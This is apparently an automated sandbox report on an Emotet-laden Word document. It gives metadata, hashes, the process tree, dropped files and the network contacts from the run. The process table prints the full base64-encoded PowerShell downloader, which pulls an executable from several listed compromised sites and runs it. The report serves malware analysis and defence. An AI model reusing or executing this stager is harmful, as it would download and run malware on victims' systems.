download: | qwswz4-9sir7-jxlh |
Full analysis: | https://app.any.run/tasks/95692cf7-91be-4290-8481-9f3973c48f29 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 13:48:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Clothing methodologies microchip, Subject: Handmade Wooden Bike, Author: Margaret Willms, Comments: unleash, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 17 06:55:00 2019, Last Saved Time/Date: Fri May 17 06:55:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0 |
MD5: | 72149D1A57493FB31E99ED26BFE495F6 |
SHA1: | F5B202B43361CF877FD7B5401F26C76CF418FD3B |
SHA256: | 26B0B2660BE3E246F487A7F824EFB63F296D6221AEAE5FB5C661ADC82C78DFAE |
SSDEEP: | 3072:M77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q4iZEA9tzzpujpOoSc:M77HUUUUUUUUUUUUUUUUUUUT52Vx+EAS |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | Clothing methodologies microchip |
Subject: | Handmade Wooden Bike |
Author: | Margaret Willms |
Keywords: | - |
Comments: | unleash |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:17 05:55:00 |
ModifyDate: | 2019:05:17 05:55:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 170 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Franecki, Green and Waters |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 198 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Hermiston |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\qwswz4-9sir7-jxlh.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
3204 | PowErsHell -enC JABjADMANwA1ADcAXwA2ADQAPQAnAGoANQA4ADcANwA1ACcAOwAkAGEAOAAyADkAOAA1ADYAMgAgAD0AIAAnADEAMgAyACcAOwAkAHAAOQAxADkAOAAxADkANgA9ACcAaQAxADkAXwBfADcAMgAnADsAJABZADIANwBfADYANQBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADgAMgA5ADgANQA2ADIAKwAnAC4AZQB4AGUAJwA7ACQARQAxAF8AMQA0ADgAMgA9ACcAYgAzADMANAA2ADMAMAAyACcAOwAkAG0ANwBfADcAOABfADAAPQAuACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQBgAFQALgB3AGAAZQBgAEIAYwBMAGkARQBOAFQAOwAkAHMANAAyAF8AOAA2ADcAPQAnAGgAdAB0AHAAOgAvAC8AYwBsAGEAcwBzAGkAYwBpAG0AYQBnAGUAcgB5AC4AYwBvAG0ALwBiAHUAcwBpAG4AZQBzAHMALwBpAEEARwBLAGIAeABmAHMAawAvAEAAaAB0AHQAcAA6AC8ALwBlAGQAYQBuAGQAdAByAGkAcwBoAC4AYwBvAG0ALwBiAGwAdQBlAC8AOAB3AHMAZQBfAHoAcgBkAG4AeAAyAGMALQA5ADcANwA1AC8AQABoAHQAdABwADoALwAvAGYAaQBuAGUAdAByAGEAZABlAC4AagBwAC8AZABhAHQAYQAvAG0ARgBhAHAAUgByAE4ARwBFAC8AQABoAHQAdABwADoALwAvAG0AZQBlAG4AYQBrAHMAaABpAG0AYQB0AHIAaQBjAGgAcwBzAC4AZQBkAHUALgBpAG4ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB6AFIAdQBuAHMARwBjAGwAcwAvAEAAaAB0AHQAcAA6AC8ALwB0AGEAbgBpAGIAaQBzAG4AaQBzAC4AdwBlAGIALgBpAGQALwB3AHAALwB4AGEAOQBvAF8AOAA4AHAAagA1AG0AYwByAC0AMgA2AC8AJwAuAFMAUABMAGkAVAAoACcAQAAnACkAOwAkAHcANQA5ADUANwA4ADAAPQAnAFgAOQAxADYANwA2ADAAXwAnADsAZgBvAHIAZQBhAGMAaAAoACQAbAAzADEANgAwADcAXwAgAGkAbgAgACQAcwA0ADIAXwA4ADYANwApAHsAdAByAHkAewAkAG0ANwBfADcAOABfADAALgBEAE8AVwBOAGwATwBBAEQAZgBpAEwARQAoACQAbAAzADEANgAwADcAXwAsACAAJABZADIANwBfADYANQBfACkAOwAkAGkAMgA2ADAAOQBfADgANAA9ACcAYQAxADkAMQA4ADAAMwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAMgA3AF8ANgA1AF8AKQAuAEwARQBOAEcAdABIACAALQBnAGUAIAAyADYANAA0ADEAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAWQAyADcAXwA2ADUAXwA7ACQAVQA2ADYAMgA4ADMAPQAnAGsAOQA4ADQAMQA2ADAAMwAnADsAYgByAGUAYQBrADsAJAB6ADYAXwA0ADYANwA1AD0AJwB3ADkAOAAzADcANAA2ADQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVAAzADcANQBfADgANwA9ACcAQwA0ADIANQA1ADgAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRED99.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3204 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXZZVTIVMELS5QI0AJ0N.temp | — | |
MD5:— | SHA256:— | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$swz4-9sir7-jxlh.doc | pgc | |
MD5:64D75435DB0D6ECBF71DB58CE64F3149 | SHA256:6A2F2F67B7385024A2923596CCA5492F8A761DDB85AD71FBB3FC2BCD8FAE3138 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:59B915F43B43901FA79C60151EA8042C | SHA256:836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F62E731C.wmf | wmf | |
MD5:216C74D71CB4F4B1D41724F0EF9FC72B | SHA256:583C4159E78B33E56D57082BE73658872F0DBC445CAD164F3CAB742231F793F4 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:BE3B51A2FFA431A7F2A35ED1AFE23D34 | SHA256:A72D859171741D1660B2A8C61D47B966A8707778B092CD9704EC2423365C351C | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FF5006D.wmf | wmf | |
MD5:1012A21156DCFF2937353BEE5985FADC | SHA256:A9F5E85E96612733BB239D8B221DEF29EFFC0E143359BB1A74882EEA75B8B601 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF602F5E.wmf | wmf | |
MD5:18177A2722B8E33F76C08B6DF450BA4F | SHA256:2A1DD05E8314D744E261661834271ADDF8E08BCEDF3B57E4D93F2063D14B880C | |||
3204 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D928C476.wmf | wmf | |
MD5:1CBF535FEBA120E606E9565F8294C672 | SHA256:60D2DC4F97BBB184D9228D01C36A3D21DD0EFC632FD0F4AB80D1D30CBCA64B88 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3204 | PowErsHell.exe | GET | — | 69.41.190.91:80 | http://edandtrish.com/blue/8wse_zrdnx2c-9775/ | US | — | — | suspicious |
3204 | PowErsHell.exe | GET | 404 | 50.31.162.218:80 | http://classicimagery.com/business/iAGKbxfsk/ | US | text | 9 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3204 | PowErsHell.exe | 69.41.190.91:80 | edandtrish.com | WZ Communications Inc. | US | suspicious |
— | — | 50.31.162.218:80 | classicimagery.com | Server Central Network | US | suspicious |
Domain | IP | Reputation |
---|---|---|
classicimagery.com |
| malicious |
edandtrish.com |
| suspicious |